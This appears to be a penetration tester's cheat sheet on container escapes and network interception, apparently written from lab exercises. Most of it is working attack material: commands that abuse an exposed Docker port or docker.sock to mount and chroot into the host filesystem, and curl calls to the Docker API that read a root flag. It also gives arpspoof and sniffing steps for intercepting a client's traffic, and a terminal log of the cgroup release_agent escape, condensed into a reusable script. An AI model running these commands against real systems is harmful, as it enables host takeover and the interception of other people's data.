Exposed docker port

If the docker port is exposed remotely, any docker commands can be executed, so any privilege escalation vector will work here.

I typically spin up a container with the --privileged flag which then allows me mount the hosts file system as root in the container.

┌──(kali㉿kali)-[~/Documents/WithSecureLabs/dockerEscapes/lab1]         
└─$ docker -H 192.168.22.130:2375 info                                 
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
 Cgroup Version: 1
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 io.containerd.runtime.v1.linux runc
 Default Runtime: runc
 Init Binary: docker-init 
 containerd version: d71fcd7d8303cbf684402823e425e9dd2e99285d
 runc version: b9ee9c6314599f1b4a7f497e1f1f856fe433d3b7
 init version: de40ad0
 Security Options:
  apparmor
  seccomp
   Profile: default
 Kernel Version: 4.19.0-17-amd64
 Operating System: Debian GNU/Linux 10 (buster)
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 899.6MiB
 Name: buster


docker -H 192.168.22.130:2374 run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

Once inside the container you can mount the file system shown below. If this doesn’t work, try a different image, or one already installed locally on the box, by listing the images with docker image ls -la

Privileged container

In a privileged container you can just mount the hosts file system usually located at /dev/sda1 into a folder of your choosing

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Exploiting Exposed socket 

#List images to use one
docker images
#Run the image mounting the host disk and chroot on it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

Exposed docker.sock with curl / API 

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["mkdir","-p","/mnt/hola"]}' -H "Content-Type: application/json"
{"Id":"c87daed87f046851f2b1a15dc813e6cb6086e0d3a9f3337299f8283a5b36ca02"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/c87daed87f046851f2b1a15dc813e6cb6086e0d3a9f3337299f8283a5b36ca02/start -d '{"Tty":true}' -H "Content-Type: application/json"

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["mount","/dev/sda1","/mnt/hola"]}' -H "Content-Type: application/json"
{"Id":"ffd2b31260388f69af4b6df22c2b841400fbb51b14c1e04ce86742e2dd96317f"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/ffd2b31260388f69af4b6df22c2b841400fbb51b14c1e04ce86742e2dd96317f/start -d '{"Tty":true}' -H "Content-Type: application/json"

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/containers/13e1568e2363cc35874f47cb032653ae94eb91f469b3bcd8f7383aacbd1527a0/exec -d '{"AttachStderr": true,"AttachStdout": true,"Tty":true,"Cmd":["cat","/mnt/hola/root/flag.txt"]}' -H "Content-Type: application/json"
{"Id":"13891b2e24ab49c5786f9cc4e96eaf99aea7012f4b40d95b8cf41549dcdd80cd"}

root@62f69d202b3a:/$ curl --unix-socket docker.sock http://localhost/v1.41/exec/13891b2e24ab49c5786f9cc4e96eaf99aea7012f4b40d95b8cf41549dcdd80cd/start -d '{"Tty":true}' -H "Content-Type: application/json"
w0ops13-i-exp0s3d-th3-un1x-s0ck3t

Arp spoof

Ensure IP forwarding is on so packets don’t die when they are directed to your machine 

echo 1 > /proc/sys/net/ipv4/ip_forward

sysctl -w net.ipv4.ip_forward=1

Forward requests from client through you 

arpspoof -i INTERFACE_NAME -t CLIENT_IP SERVER_IP

Forward requests from server through you 

arpspoof -i INTERFACE_NAME -t SERVER_IP CLIENT_IP

Dump the data you’re intercepting 

tcpdump -A src CLIENT_IP

dsniff <-- tool for sniffing passords but also comes with some other great packet sniffing tools like urlsnarf

urlsnarf

driftnet - picks out images from tcp streams

Privileged container 

mnt /dev/sda1 /mnt/<MNT POINT>

runc 

root@gitlab:~# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x 

root@gitlab:~# echo 1 > /tmp/cgrp/x/notify_on_release       

root@gitlab:~# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` 

root@gitlab:~# echo "$host_path/cmd" > /tmp/cgrp/release_agent

root@gitlab:~# echo '#!/bin/sh' > /cmd

root@gitlab:~# echo "ps aux > $host_path/output" >> /cmd

root@gitlab:~# chmod a+x /cmd

root@gitlab:~# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

root@gitlab:~# cat /tmp/cgrp/release_agent

/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/cmd

root@gitlab:~# head /output
head /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1 167716  7728 ?        Ss   04:20   0:08 /sbin/init maybe-ubiquity
root           2  0.0  0.0      0     0 ?        S    04:20   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   04:20   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   04:20   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   04:20   0:00 [kworker/0:0H-kblockd]
root           9  0.0  0.0      0     0 ?        I<   04:20   0:00 [mm_percpu_wq]
root          10  0.0  0.0      0     0 ?        S    04:20   0:01 [ksoftirqd/0]
root          11  0.0  0.0      0     0 ?        I    04:20   0:34 [rcu_sched]
root          12  0.0  0.0      0     0 ?        S    04:20   0:00 [migration/0]


root@gitlab:~# echo '#!/bin/sh' > /cmd
echo '#!/bin/sh' > /cmd

root@gitlab:~# echo "id > $host_path/output" >> /cmd
echo "id > $host_path/output" >> /cmd

root@gitlab:~# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

root@gitlab:~# head /output
head /output

uid=0(root) gid=0(root) groups=0(root)

Summarised terminal output

That was quite a lot of text for an exploit, here its more condensed

#!/bin/bash

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "<your_command_to_run_on_host> > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

View command output:
cat /output